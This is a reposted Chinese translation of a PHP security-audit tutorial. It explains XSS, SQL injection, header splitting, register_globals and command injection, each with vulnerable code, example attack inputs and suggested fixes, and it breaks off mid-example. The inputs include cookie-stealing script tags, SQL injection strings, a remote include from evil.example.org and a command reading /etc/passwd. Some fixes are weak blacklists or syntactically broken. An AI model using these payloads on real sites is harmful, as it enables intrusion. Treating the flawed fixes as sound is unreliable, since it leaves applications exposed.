{"id":872,"date":"2014-08-05T16:17:42","date_gmt":"2014-08-05T16:17:42","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=872"},"modified":"2014-08-05T16:17:42","modified_gmt":"2014-08-05T16:17:42","slug":"collectphp-fuzzing%e8%a1%8c%e5%8a%a8-%e6%ba%90%e7%a0%81%e5%ae%a1%e8%ae%a1","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/872.html","title":{"rendered":"[collect]PHP Fuzzing\u884c\u52a8\u2014\u2014\u6e90\u7801\u5ba1\u8ba1"},"content":{"rendered":"<p><strong>PHP Fuzzing<\/strong><strong>\u884c\u52a8\u2014\u2014\u6e90\u7801\u5ba1\u8ba1<\/strong><\/p>\n<p>\u4f5c\u8005\uff1aShahin Ramezany<\/p>\n<p>\u8bd1\u8005\uff1ariusksk\uff08\u6cc9\u54e5\uff1a<a href=\"http:\/\/riusksk.blogbus.com\/\" target=\"_blank\">http:\/\/riusksk.blogbus.com<\/a>\uff09<\/p>\n<p><strong>\u76ee\u5f55\uff1a<\/strong><\/p>\n<p><strong>Section 1:<\/strong><\/p>\n<p>20\u79cdPHP\u6e90\u7801\u5feb\u901f\u5ba1\u8ba1\u65b9\u5f0f<\/p>\n<p><strong>Section 2:<\/strong><\/p>\n<p>PHP\u6e90\u7801\u5ba1\u8ba1\u81ea\u52a8\u5316<em>( PHP Fuzzer )<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u98ce\u9669\u7ea7\u522b\uff1a<\/strong><\/p>\n<p>\u25a0 <strong>Low<\/strong><\/p>\n<p>\u25a0 <strong>Medium<\/strong><\/p>\n<p>\u25a0 <strong>High<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>\u5728\u5f00\u59cbPHP\u4ee3\u7801\u5206\u6790\u4e4b\u524d\uff0c\u8bfb\u8005\u5fc5\u987b\u5148\u5b8c\u6210\u4ee5\u4e0b\u4e24\u9879\u5de5\u4f5c\uff1a<\/p>\n<p>\uff11\uff0e\u5b89\u88c5PHP\u7a0b\u5e8f\uff1b<\/p>\n<p>\uff12\uff0e\u4f7f\u7528\u652f\u6301PHP\u4ee3\u7801\u9ad8\u4eae\u7684\u7f16\u8f91\u5668\uff08\u6bd4\u5982<em>Emeditor &#8211; Notepad++<\/em>\uff09\u3002<\/p>\n<p>\u7b14\u8005\u5728\u4e0b\u6587\u4e2d\u6240\u63d0\u4f9b\u7684\u65b9\u6cd5\u4ec5\u4f5c\u4e3a\u7b80\u5355\u7684\u653b\u51fb\u548c\u9632\u5fa1\u53c2\u8003\u3002\u672c\u6587\u65e8\u5728\u4ecb\u7ecd\u653b\u51fb\u548c\u9632\u5fa1\u65b9\u6cd5\u3002<\/p>\n<p>\u6ce8\u610f\uff11\uff1a\u5176\u4e2d\u4e00\u4e9b\u8bdd\u9898\u5f52Wikipedia\u7248\u6743\u6240\u6709<\/p>\n<p>\u6ce8\u610f\uff12\uff1a\u5fc5\u987b\u5728PHP\u6e90\u7801\u4e2d\u5bfb\u627e\u4ee5\u4e0b\u53d8\u91cf\uff1a<\/p>\n<ul>\n<ul>\n<li>$_SERVER<\/li>\n<li>$_GET<\/li>\n<li>$_POST<\/li>\n<li>$_COOKIE<\/li>\n<li>$_REQUEST<\/li>\n<li>$_FILES<\/li>\n<li>$_ENV<\/li>\n<li>$_HTTP_COOKIE_VARS<\/li>\n<li>$_HTTP_ENV_VARS<\/li>\n<li>$_HTTP_GET_VARS<\/li>\n<li>$_HTTP_POST_FILES<\/li>\n<li>$_HTTP_POST_VARS<\/li>\n<li>$_HTTP_SERVER_VARS<\/li>\n<\/ul>\n<\/ul>\n<p>\u4ee5\u4e0a\u53d8\u91cf\u5747\u4e3aPHP\u4e2d\u7684\u53ef\u8f93\u5165\u53d8\u91cf\u3002<\/p>\n<p>\u6ce8\u610f\uff13\uff1a\u5173\u4e8e\u8fd9\u4e9b\u53d8\u91cf\u7684\u66f4\u591a\u4fe1\u606f\u53ef\u8bbf\u95eePHP\u5b98\u65b9\u7f51\u7ad9\uff1a<a href=\"http:\/\/www.php.net\/\">www.php.net<\/a>\u3002<\/p>\n<p>&nbsp;<\/p>\n<h5><strong>Section 1: 20<\/strong><strong>\u79cd<\/strong><strong>PHP<\/strong><strong>\u6e90\u7801\u5feb\u901f\u5ba1\u8ba1\u65b9\u5f0f<\/strong><\/h5>\n<h6><strong>1- <\/strong><strong>Cross Site Scripting <\/strong><strong>(XSS) \/ CRLF [Medium]<\/strong><\/h6>\n<p>\u8de8\u7ad9\u811a\u672c\uff08XSS\uff09\u5c5e\u4e8eWEB\u7a0b\u5e8f\u4e2d\u7684\u4e00\u7c7b\u8ba1\u7b97\u673a\u5b89\u5168\u6f0f\u6d1e\uff0c\u5b83\u5141\u8bb8\u5728\u7528\u6237\u6d4f\u89c8\u7684\u7f51\u9875\u4e2d\u6ce8\u5165\u6076\u610f\u4ee3\u7801\uff0c\u6bd4\u5982HTML\u4ee3\u7801\u548c\u5ba2\u6237\u7aef\u811a\u672c\u3002\u53ef\u5229\u7528\u7684\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\u53ef\u88ab\u653b\u51fb\u8005\u7528\u4e8e\u7ed5\u8fc7\u8bbf\u95ee\u63a7\u5236\uff0c\u6bd4\u5982\u540c\u6e90\u7b56\u7565\uff08same origin policy\uff09\u3002\u8fd9\u7c7b\u6f0f\u6d1e\u53ef\u88ab\u7528\u4e8e\u6784\u9020\u9493\u9c7c\u653b\u51fb\u548c\u6d4f\u89c8\u5668\u653b\u51fb\u3002<\/p>\n<h6><span style=\"color: rgb(255, 0, 0);\"><strong>\u653b\u51fb\uff1a<\/strong><\/span><\/h6>\n<p>\u653b\u51fb\u8005\u5728\u5176\u8bf7\u6c42\u4e2d\u6ce8\u5165HTML\u4ee3\u7801\u3002<\/p>\n<p>Exp 1:<\/p>\n<p>&lt;?php<\/p>\n<p>$error_message = $_GET[&#8216;error&#8217;];<\/p>\n<p>print $error_message ;<\/p>\n<p>?&gt;<\/p>\n<p><em>index.php?error=&lt;script&gt;alert(document.cookie)&lt;\/script&gt;<\/em><\/p>\n<p>Exp 2:<\/p>\n<p>&lt;html&gt;<\/p>\n<p>&lt;body&gt;<\/p>\n<p>&lt;input name=&#8221;show_courses&#8221; value=&#8221;&lt;?php echo $_GET[&#8216;show_courses&#8217;]; ?&gt;&#8221; &gt;<\/p>\n<p>&lt;\/body&gt;<\/p>\n<p>&lt;\/html&gt;<\/p>\n<p>#http:\/\/127.0.0.1:81\/1.php?show_courses=&#8221;&gt;&lt;script&gt;alert(document.cookie);&lt;\/script&gt;<\/p>\n<h6><strong>\u9632\u5fa1\uff1a<\/strong><\/h6>\n<p>&lt;?php<\/p>\n<p>$error_message = $_GET[&#8216;error&#8217;];<\/p>\n<p>print htmlspecialchars($error_message );<\/p>\n<p>?&gt;<\/p>\n<h6>\u66f4\u591a\u8d44\u6599\uff1a<\/h6>\n<p>http:\/\/ha.ckers.org\/xss.html<\/p>\n<p>http:\/\/en.wikipedia.org\/wiki\/Cross-site_scripting<\/p>\n<p><a href=\"http:\/\/www.googlebig.com\/forum\/cross-site-scripting-attack-and-defense-guide-t-178.html\" target=\"_blank\">http:\/\/www.googlebig.com\/forum\/cross-site-scripting-attack-and-defense-guide-t-178.html<\/a><\/p>\n<p>&nbsp;<\/p>\n<h6><strong>2- SQL Injection [medium]<\/strong><\/h6>\n<p>SQL\u6ce8\u5165\u662f\u5229\u7528WEB\u7a0b\u5e8f\u6570\u636e\u5c42\u7684\u5b89\u5168\u6f0f\u6d1e\u8fdb\u884c\u4ee3\u7801\u6ce8\u5165\u7684\u6280\u672f\u3002\u5f53\u7528\u6237\u8f93\u5165\u7684\u6570\u636e\u4e2d\u5e76\u672a\u5bf9\u5d4c\u5165\u7684SQL\u58f0\u660e\u8bed\u53e5\u8fdb\u884c\u6b63\u786e\u8fc7\u6ee4\u65f6\uff0c\u6216\u8005\u7528\u6237\u5e76\u6ca1\u6709\u88ab\u4e25\u683c\u5730\u9650\u5236\u8f93\u5165\uff0c\u4ece\u800c\u5bfc\u81f4\u6076\u610f\u4ee3\u7801\u88ab\u6267\u884c\uff0c\u5c31\u6709\u53ef\u80fd\u9020\u6210SQL\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fd9\u662f\u4e00\u7c7b\u5f88\u666e\u904d\u7684\u5b89\u5168\u6f0f\u6d1e\uff0c\u5b83\u53ef\u5728\u4efb\u4f55\u65f6\u5019\u53d1\u751f\u4e8e\u88ab\u5d4c\u5165\u7684\u7f16\u7a0b\u6216\u811a\u672c\u8bed\u8a00\u4e4b\u4e2d\u3002<\/p>\n<h6>\u653b\u51fb\uff1a<\/h6>\n<p>SQL\u6ce8\u5165\u662fPHP\u4ee3\u7801\u5ba1\u8ba1\u8fc7\u7a0b\u4e2d\u53d1\u73b0\u7684\u6700\u4e3a\u4e25\u91cd\u7684\u6f0f\u6d1e\u4e4b\u4e00\uff0c\u5173\u4e8e\u8fd9\u7c7b\u653b\u51fb\u66f4\u591a\u7684\u4fe1\u606f\u53ef\u4ee5\u901a\u8fc7\u9605\u8bfb\u4e0b\u9762\u63d0\u4f9b\u7684\u53c2\u8003\u8d44\u6599\u83b7\u5f97\uff0c\u800c\u8fd9\u91cc\u53ea\u662f\u7b80\u8ff0\u6b64\u7c7b\u6f0f\u6d1e\u800c\u5df2\u3002<\/p>\n<p><strong>Example 1:<\/strong><\/p>\n<p>&lt;?php<\/p>\n<p>$id= $_GET[&#8216;id&#8217;];<\/p>\n<p>$query= &#8220;SELECT * FROM users WHERE id= &#8216; \u201c .$id.&#8221; ;&#8221;<\/p>\n<p>&#8230;<\/p>\n<p>?&gt;<\/p>\n<p>index.php?id=1+UNION+SELECT+1,@@version,3,4,5+from+users\/*<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Example 2:<\/strong><\/p>\n<p>#login.php\uff1a<\/p>\n<p>&lt;?<\/p>\n<p>\/\/login.php &#8212; SQL Injection Vulnerable page<\/p>\n<p>\/\/Attack and defence php apps book<\/p>\n<p>\/\/shahriyar &#8211; j<\/p>\n<p>$user = $_POST[&#8216;user&#8217;];<\/p>\n<p>$pass = $_POST[&#8216;pass&#8217;];<\/p>\n<p>$link = mysql_connect(&#8216;localhost&#8217;, &#8216;root&#8217;, &#8216;pass&#8217;) or die(&#8216;Error: &#8216;.mysql_e<\/p>\n<p>rror());<\/p>\n<p>mysql_select_db(&#8220;sql_inj&#8221;, $link);<\/p>\n<p>$query = mysql_query(&#8220;SELECT * FROM sql_inj WHERE user ='&#8221;.$user.&#8221;&#8216; AND pas<\/p>\n<p>s ='&#8221; .$pass. &#8220;&#8216;&#8221;,$link);<\/p>\n<p>if (mysql_num_rows($query) == 0) {<\/p>\n<p>echo&#8221;&lt;scripttype=&#8221;text\/javascript&#8221;&gt;window.location.href=&#8217;index.html&#8217;;&lt;\/sc<\/p>\n<p>ript&gt;&#8221;;<\/p>\n<p>exit;<\/p>\n<p>}<\/p>\n<p>$logged = 1;<\/p>\n<p>?&gt;<\/p>\n<p>\u5f53\u7528\u6237\uff08\u53ef\u80fd\u4e3a\u653b\u51fb\u8005\uff09\u53d1\u9001$_POST[&#8216;user&#8217;] , $_POST[&#8216;pass&#8217;]\u7ed9 login.php\u65f6\uff0c\u8fd9\u4e9b\u53d8\u91cf\u76f4\u63a5\u5b58\u50a8\u5728SQL\u8bf7\u6c42\u547d\u4ee4\u4e2d\u3002\u5982\u679c\u653b\u51fb\u8005\u53d1\u9001\uff1a<\/p>\n<p><em>$user = 1&#8242; OR &#8216;1&#8217; = &#8216;1<\/em><\/p>\n<p><em>$pass = 1&#8242; OR &#8216;1&#8217; = &#8216;1<\/em><\/p>\n<p>\u5c06\u4f1a\u7ed5\u8fc7login.php\u7684\u767b\u9646\u9a8c\u8bc1\uff0c\u8bfb\u8005\u5f53\u6ce8\u610f\u6b64\u7c7b\u4ee3\u7801\u3002<\/p>\n<h6><strong>\u9632\u5fa1\uff1a<\/strong><\/h6>\n<p>\u4e0b\u9762\u662f\u901a\u7528\u7684\u9632\u6ce8\u5165\u4ee3\u7801\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$title = $_POST[&#8216;title&#8217;]; \/\/ user input from site<\/p>\n<p>$description = $_POST[&#8216;description&#8217;]; \/\/ user input from site<\/p>\n<p>\/\/ define the cleaner<\/p>\n<p>$dirtystuff = array(&#8220;&#8221;&#8221;, &#8220;\\&#8221;, &#8220;\/&#8221;, &#8220;*&#8221;, &#8220;&#8216;&#8221;, &#8220;=&#8221;, &#8220;-<\/p>\n<p>&#8220;, &#8220;#&#8221;, &#8220;;&#8221;, &#8220;&lt;&#8220;, &#8220;&gt;&#8221;, &#8220;+&#8221;, &#8220;%&#8221;);<\/p>\n<p>\/\/ clean user input (if it finds any of the values above, it will replace it with<\/p>\n<p>whatever is in the quotes &#8211; in this example, it replaces the value with nothing)<\/p>\n<p>$title = str_replace($dirtystuff, &#8220;&#8221;, $title); \/\/ works!<\/p>\n<p>$description = str_replace($dirtystuff, &#8220;&#8221;, $description); \/\/ works!<\/p>\n<p>\/\/ input: I &#8220;like\/ green&lt; ** veg&#8217;et=a-bles&gt; ;and&lt; pizza**<\/p>\n<p>\/\/ output: I like green vegetables and pizza<\/p>\n<p>\/\/ input: a&#8217;;DROP TABLE users; SELECT * FROM data WHERE name LIKE &#8216;%<\/p>\n<p>\/\/ output: aDROP TABLE users SELECT FROM data WHERE name LIKE<\/p>\n<p>?&gt;<\/p>\n<p>&lt;\u8bd1\u6ce8\uff1a\u6700\u597d\u8fd8\u662f\u91c7\u7528\u767d\u540d\u5355\u7684\u8fc7\u6ee4\u65b9\u5f0f&gt;<\/p>\n<h6>\u66f4\u591a\u4fe1\u606f :<\/h6>\n<p>http:\/\/en.wikipedia.org\/wiki\/Sql_injection<\/p>\n<p>http:\/\/drewish.com\/files\/SQL Injection Overview.ppt<\/p>\n<p>http:\/\/www.php.net\/manual\/en\/security.database.sql-injection.php<\/p>\n<h6>\u653b\u51fb\u5b9e\u4f8b\uff1a<\/h6>\n<p>http:\/\/www.milw0rm.com\/papers\/241<\/p>\n<p>http:\/\/www.milw0rm.com\/papers\/202<\/p>\n<p>&nbsp;<\/p>\n<h6><strong>2- <\/strong><strong>HTTP Response Splitting [Medium]<\/strong><\/h6>\n<p>HTTP\u54cd\u5e94\u5206\u88c2\u662f\u4e00\u79cdWEB\u7a0b\u5e8f\u6f0f\u6d1e\uff0c\u5b83\u53ef\u4ee5\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u6216\u8005\u73af\u5883\u8bbe\u7f6e\u5bf9\u8f93\u5165\u503c\u7684\u8fc7\u6ee4\u5931\u6548\uff0c\u4e5f\u53ef\u4ee5\u6267\u884c\u8de8\u7ad9\u811a\u672c\u653b\u51fb\uff0c\u8de8\u7528\u6237\u653b\u51fb\uff0cWEB\u7f13\u5b58\u4e2d\u6bd2\u4ee5\u53ca\u5176\u5b83\u7c7b\u4f3c\u7684\u653b\u51fb\u3002<\/p>\n<h6>\u91cd\u8981\u7684HTTP\u5934\u5217\u8868\uff1a<\/h6>\n<p><a href=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-873\" src=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_1-300x300.png\" alt=\"http_header_1\" width=\"300\" height=\"300\" \/><\/a> <a href=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-874\" src=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_2-300x50.png\" alt=\"http_header_2\" width=\"300\" height=\"50\" \/><\/a> <a href=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-875\" src=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_3-300x295.png\" alt=\"http_header_3\" width=\"300\" height=\"295\" \/><\/a> <a href=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_4.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-876\" src=\"http:\/\/ixyzero.com\/blog\/wp-content\/uploads\/2014\/08\/http_header_4-300x62.png\" alt=\"http_header_4\" width=\"300\" height=\"62\" \/><\/a><\/p>\n<p>\u5728PHP\u8bed\u8a00\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u201dheader\u201d\u51fd\u6570\u6765\u8bbe\u7f6eHTTP\u5934\uff0c\u5728\u4e00\u4e9bPHP\u6e90\u7801\u4e2d\uff0c\u4f60\u53ef\u4ee5\u53d1\u73b0&#8221;<strong>header<\/strong>&#8220;,<strong> &#8220;$_SERVER<\/strong>&#8220;\u7b49\u51fd\u6570\u3002\u5728<strong>&#8220;$_SERVER<\/strong>&#8220;\u51fd\u6570\u4e2d\u7684\u4e00\u4e9b\u53c2\u6570\u5305\u542b\u6709\u7528\u6237\u8f93\u5165\u7684\u6570\u636e\uff1a<\/p>\n<p><em>REQUEST_URI, PATH_INFO, QUERY_STRING<\/em><\/p>\n<p><strong>Example 1:<\/strong><\/p>\n<p>&lt;?php<\/p>\n<p>redirect_page = $_GET[&#8216;page&#8217;];<\/p>\n<p>header (&#8220;Location: &#8221; . redirect_page);<\/p>\n<p>?&gt;<\/p>\n<p>redirect.php?page=http:\/\/www.abysssec.com<\/p>\n<p><strong>For $_SERVER:<\/strong><\/p>\n<p>&lt;?php<\/p>\n<p>echo &#8220;Welcome From &#8221; . $_SERVER[&#8216;HTTP_REFERER&#8217;];<\/p>\n<p>?&gt;<\/p>\n<p>\u53ef\u4ee5\u4f7f\u7528Mozilla Firefox\u63d2\u4ef6&#8221;Tamper Data&#8221;\u6765\u53d1\u9001\u901a\u5e38\u7684HTTP header\uff1a<\/p>\n<p>https:\/\/addons.mozilla.org\/en-US\/firefox\/addon\/966<\/p>\n<p><strong>Example 2 :<\/strong><\/p>\n<p>&lt;?php<\/p>\n<p>$Name = &#8220;test&#8221;; \/\/senders name<\/p>\n<p>$email = &#8220;email@adress.com&#8221;; \/\/senders e-mail adress<\/p>\n<p>$recipient = $_GET[&#8216;to&#8217;];\/\/recipient<\/p>\n<p>$mail_body = &#8220;The text for the mail&#8230;&#8221;; \/\/mail body<\/p>\n<p>$subject = &#8220;Subject \u2026&#8221;; \/\/subject<\/p>\n<p>$header = &#8220;From: &#8220;. $Name . &#8221; &lt;&#8221; . $email . &#8220;&gt;rn&#8221;;<\/p>\n<p>mail($recipient, $subject, $mail_body, $header); \/\/mail command \ud83d\ude42<\/p>\n<p>?&gt;<\/p>\n<p>CRLF\u662fHTTP Response Splitting\u7684\u53e6\u4e00\u79cd\u65b9\u5f0f\u3002\u5728\u4e0a\u9762\u7684\u4f8b\u5b50\u4e2d\uff0c\u884c4\u4e2d\u7684$recipient\u53d8\u91cf\u5e76\u6ca1\u6709\u5bf9\u6240\u6709\u7684\u8f93\u5165\u6570\u636e\u8fdb\u884c\u68c0\u6d4b\uff0c\u4ee5\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u6dfb\u52a0\u201cCC\u201d\uff1a<\/p>\n<p>\u9ed8\u8ba4\u8f93\u5165\u4e3a\uff1a<\/p>\n<p>$headers = &#8220;From: myplace@here.comrn&#8221;;<\/p>\n<p>$headers .= &#8220;CC: sombodyelse@noplace.comrn&#8221;;<\/p>\n<p>\u201cCC\u201d \u548c \u201dFrom\u201d \u88ab \u201drn\u201d \u5206\u9694\u3002<\/p>\n<p>\u6c61\u67d3\u8f93\u5165\uff1a<\/p>\n<p><em>Mail.php?to=info@test.comrnCC: sombodyelse@noplace.com<\/em><\/p>\n<h6><strong>\u9632\u5fa1\uff1a<\/strong><\/h6>\n<p><strong>1- <\/strong>\u68c0\u6d4bMail Header\u7684\u8f93\u5165\u503c<\/p>\n<p><strong>2- <\/strong>\u53ef\u4f7f\u7528\u4ee5\u4e0b\u65b9\u5f0f\u8f93\u5165\uff0c\u800c\u4e0d\u7528URL\u8f93\u5165\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$id = $_GET[&#8216;url_id&#8217;];<\/p>\n<p>if ($id == 1) {<\/p>\n<p>header (&#8220;Location: &#8221; . redirect_page);<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p>\u548c:<\/p>\n<p>&lt;?php<\/p>\n<p>echo &#8220;Welcome From &#8221; . htmlspecialchars($_SERVER[&#8216;HTTP_REFERER&#8217;]);<\/p>\n<p>?&gt;<\/p>\n<h6><strong>\u653b\u51fb\u5b9e\u4f8b<\/strong><strong>:<\/strong><\/h6>\n<ul>\n<li>(video) : http:\/\/www.milw0rm.com\/video\/watch.php?id=28<\/li>\n<li>http:\/\/www.securiteam.com\/unixfocus\/6F00Q0K6AK.html<\/li>\n<li>http:\/\/o0o.nu\/~meder\/o0o_Blogger_HTTP_response_splitting.txt<\/li>\n<li>http:\/\/www.securityfocus.com\/archive\/1\/369405<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h6><strong>4- <\/strong><strong>\u52a8\u6001\u8d4b\u503c\u6f0f\u6d1e<\/strong><strong> [High]:<\/strong><\/h6>\n<p>1-\u5f53\u4f7f\u7528\u52a8\u6001\u51fd\u6570\u52a0\u8f7d\u65f6\uff0c\u53ef\u901a\u8fc7\u8bf7\u6c42\u6765\u6267\u884c\u6307\u5b9a\u7684\u51fd\u6570\uff0c\u5bfc\u81f4\u653b\u51fb\u8005\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u51fd\u6570\u3002<\/p>\n<h6>\u653b\u51fb\uff1a<\/h6>\n<p>&lt;?php<\/p>\n<p>$myfunc = $_GET[&#8216;myfunc&#8217;];<\/p>\n<p>$myfunc();<\/p>\n<p>?&gt;<\/p>\n<p><em>Index.php?myfunc=phpinfo<\/em><\/p>\n<p>2-<span style=\"color: rgb(255, 0, 0);\"><strong>\u5168\u5c40\u51fd\u6570\u6f0f\u6d1e<\/strong><\/span><\/p>\n<p>Register Global\u662f\u5371\u9669\u7684\u201cPHP\u6269\u5c55\u201d\uff1a<\/p>\n<p>\u5f53\u5176\u6253\u5f00\u65f6\uff0cregister_globals\u53ef\u5229\u7528\u5404\u79cd\u53d8\u91cf\u6ce8\u5165\u811a\u672c\u4ee3\u7801\uff0c\u6bd4\u5982\u6765\u81eaHTML\u8868\u5355\u7684\u8bf7\u6c42\u3002\u8fd9\u79cd\u6f0f\u6d1e\u4e3b\u8981\u4e0ePHP\u53d8\u91cf\u672a\u521d\u59cb\u5316\u76f8\u5173\uff0c\u4ee5\u81f4\u8f7b\u800c\u6613\u4e3e\u5730\u5373\u53ef\u5411\u5176\u5199\u5165\u6076\u610f\u4ee3\u7801\u3002\u8fd9\u662f\u4e00\u4e2a\u8270\u96be\u5730\u6289\u62e9\uff0c\u4f46PHP\u5b98\u65b9\u6700\u540e\u4f9d\u7136\u51b3\u5b9a\u5728\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u7981\u6b62\u8be5\u6307\u4ee4\u3002\u5f53\u5141\u8bb8\u8be5\u6307\u4ee4\u65f6\uff0c\u7528\u6237\u4ecd\u53ef\u4f7f\u7528\u53d8\u91cf\uff0c\u4f46\u65e0\u6cd5\u786e\u5b9a\u5b83\u662f\u6765\u81ea\u54ea\u91cc\uff0c\u800c\u53ea\u80fd\u9760\u731c\u6d4b\u3002\u5728\u811a\u672c\u4e2d\u5b9a\u4e49\u7684\u5185\u90e8\u53d8\u91cf\u5f88\u5bb9\u6613\u4e0e\u7528\u6237\u53d1\u9001\u7684\u8bf7\u6c42\u6570\u636e\u76f8\u6df7\u6dc6\uff0c\u800c\u53ea\u80fd\u901a\u8fc7\u7981\u6b62register_globals\u6765\u89e3\u51b3\u8fd9\u79cd\u60c5\u51b5\u3002\u4e0b\u9762\u6f14\u793a\u4e00\u4e2a\u672a\u4f7f\u7528register_globals\u7684\u4f8b\u5b50\uff1a<\/p>\n<p>Admin.php<\/p>\n<p>&lt;?php<\/p>\n<p>if (isset($is_admin)) {<\/p>\n<p>\/\/Yes, I&#8217;m the admin so call the Administration Pannel<\/p>\n<p>[&#8230;]<\/p>\n<p>} else {<\/p>\n<p>\/\/No, I&#8217;m not the admin<\/p>\n<p>[&#8230;]<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p># admin.php?is_admin=1<\/p>\n<p>\u53e6\u4e00\u4e2a\u8bf4\u660eregister_globals\u5b58\u5728\u95ee\u9898\u7684\u4f8b\u5b50\u5c31\u662f\u4e0b\u9762\u5173\u4e8e\u52a8\u6001\u8def\u5f84\u7684\u5305\u542b\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>include &#8220;$path\/script.php&#8221;;<\/p>\n<p>?&gt;<\/p>\n<p>\u5f53\u5141\u8bb8register_globals\u65f6\uff0c\u53ef\u7528\u4ee5\u4e0b\u65b9\u5f0f\u8bf7\u6c42\u9875\u9762\uff1a<\/p>\n<p><em>Index.php?path=http:\/\/evil.example.org\/?<\/em><\/p>\n<p>\u76f8\u5f53\u4e8e\u4e0b\u9762\u7684\u8bf7\u6c42\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>include &#8216;http:\/\/evil.example.org\/?\/script.php&#8217;;<\/p>\n<p>?&gt;<\/p>\n<p>\u6ce8\u610f\uff08php.ini\u914d\u7f6e\uff09\uff1a<\/p>\n<p>\u5982\u679c<em>allow_url_fopen<\/em>\u662fenabled\uff08\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u662fenabled,\u751a\u81f3\u5728php.ini\u4e2d\u6c11\u88ab\u63a8\u8350\u7684\u8bbe\u7f6e\uff09\uff0c\u8fd9\u5c06\u5305\u542b<a href=\"http:\/\/evil.example.org\/\">http:\/\/evil.example.org\/<\/a>\u7684\u8f93\u51fa\uff0c\u6b63\u5982\u672c\u5730\u6587\u4ef6\u4e00\u822c\u3002\u8fd9\u662f\u4e00\u4e2a\u4e25\u91cd\u7684\u5b89\u5168\u6f0f\u6d1e\uff0c\u8fd9\u4e5f\u662f\u5728\u4e00\u4e9b\u5f00\u6e90\u7684\u4ee3\u7801\u7a0b\u5e8f\u4e2d\u88ab\u53d1\u73b0\u7684\u3002<\/p>\n<h6><strong>\u9632\u5fa1\uff1a<\/strong><\/h6>\n<p>\u4e0d\u8981\u4f7f\u7528\u8fd9\u79cd\u65b9\u5f0f\u53bb\u52a0\u8f7d\u51fd\u6570\uff0c\u8fd9\u662f\u4e00\u4e2a\u5371\u9669\u5730\u5e26\uff01\u4efb\u4f55\u65f6\u5019\uff0c\u4efb\u4f55\u60c5\u51b5\u4e0b\uff0cRegister Global\u90fd\u5e94\u8be5\u5173\u95ed\uff01\u6216\u8005\u5c06\u53d8\u91cf\u7684\u5185\u5bb9\u8bbe\u7f6e\u5982\u4e0b\uff1a<\/p>\n<p>&lt;?php<\/p>\n<p>$is_admin =();<\/p>\n<p>if (isset($is_admin)) {<\/p>\n<p>\/\/Yes, I&#8217;m the admin so call the Administration Pannel<\/p>\n<p>[&#8230;]<\/p>\n<p>} else {<\/p>\n<p>\/\/No, I&#8217;m not the admin<\/p>\n<p>[&#8230;]<\/p>\n<p>}<\/p>\n<p>?&gt;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u653b\u51fb\u5b9e\u4f8b \/ <\/strong><strong>\u4fe1\u606f\uff1a<\/strong><\/p>\n<p>http:\/\/www.milw0rm.com\/exploits\/7705<\/p>\n<p>http:\/\/wiki.lunarpages.com\/PHP_and_Register_Global_Variables<\/p>\n<h6><strong>5- <\/strong><strong>\u8fdb\u7a0b\u63a7\u5236<\/strong><strong>\/PHP<\/strong><strong>\u4ee3\u7801\u6ce8\u5165<\/strong><strong> (HIGH):<\/strong><\/h6>\n<p>\u5f53\u6211\u4eec\u4f7f\u7528\u4e0b\u5217\u51fd\u6570\uff1a\u201cPHP\u8fdb\u7a0b\u6267\u884c\u51fd\u6570&amp;\u8fdb\u7a0b\u63a7\u5236\u201d\uff0c\u5e76\u4e14\u7528\u6237\u53ef\u4ee5\u8f93\u5165\u53d8\u91cf\uff08\u89c1\u4e0a\u9762\uff09\uff0c\u90a3\u4e48\u5c06\u5bfc\u81f4\u4efb\u610f\u7684PHP\u4ee3\u7801\u88ab\u6267\u884c\u3002<\/p>\n<p>PHP\u8fdb\u7a0b\u63a7\u5236\u5217\u8868\uff1a<\/p>\n<ul>\n<li><em>Exec<\/em><\/li>\n<li><em>system<\/em><\/li>\n<li><em>passthru<\/em><\/li>\n<li><em>shell_exec<\/em><\/li>\n<li><em>proc_open<\/em><\/li>\n<li><em>pcntl_exec<\/em><\/li>\n<\/ul>\n<p>Example 1:<\/p>\n<p>&lt;?php<\/p>\n<p>$page = $_GET[&#8216;page&#8217;];<\/p>\n<p>system (&#8220;type &#8221; . $page);<\/p>\n<p>?&gt;<\/p>\n<p># index.php?page=\/etc\/passwd | uname \u2013a<\/p>\n<p>Example 